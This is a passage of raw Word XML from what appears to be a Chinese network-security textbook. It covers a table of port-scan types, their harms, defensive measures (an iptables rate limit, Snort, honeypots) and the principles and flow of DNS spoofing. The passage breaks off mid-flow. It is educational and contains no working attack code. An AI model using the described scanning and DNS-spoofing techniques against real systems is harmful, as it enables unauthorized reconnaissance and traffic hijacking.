      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>常见扫描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18"/>
        <w:gridCol w:w="5826"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="063FE9B7" w14:textId="77777777" w:rsidTr="00501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48133B0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扫描类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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BA8CFFD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原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="10948A12" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1706" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5CF5CBEC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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SYN</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3294" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C9D10A6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半开放扫描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(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不完成握手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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4A33861F" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1706" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2D819F3E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rFonts w:cs="Times New Roman"/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ACK</w:t>
            </w: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扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3294" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="60C6EB08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探测防火墙规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="40B6D5B4" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1706" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="35AD2289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XMAS</w:t>
            </w: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扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3294" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E12C25A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发送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FIN/URG/PSH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标志组合</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1D26F445" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1706" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41314085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空闲扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3294" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1984F7E6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利用僵尸主机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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A75BA01" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116DA862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危害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E1805C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击面测绘：暴露系统脆弱点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04060B37" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务漏洞利用：针对特定版本服务发起攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8DC86" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络拓扑发现：绘制内网结构图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60EC93" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全策略探测：测试防火墙规则有效性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760B2D2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防御措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B8FFF3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防火墙配置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3FE910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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDCF835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 xml:space="preserve">iptables -A INPUT -p tcp --syn -m limit --limit 1/s -j ACCEPT  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>速率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512AEA96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端口隐藏：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76765488" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭不必要端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3495CFA8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改默认服务端口（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>62222</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C2962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lastRenderedPageBreak/>
        <w:t>入侵检测：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC8E22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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E45A02C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 xml:space="preserve">snort -q -c /etc/snort/snort.conf  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>检测扫描行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E6829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蜜罐系统：部署伪装服务误导攻击者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598EE53A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>欺骗攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCD77B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攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E37BB9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议无认证机制的缺陷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590E5394" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A939C6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存投毒：向</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器注入虚假记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A0EB7" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间人攻击：劫持</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB33548" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器：控制客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080FEAD8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将合法域名解析到恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B11238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攻击流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514DF8F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>正常流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD15C66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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> www.example.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>返回真实</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP(93.184.216.34)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D27AAA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>攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B89BC7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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>响应</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3D2133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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>响应内容：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">www.example.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
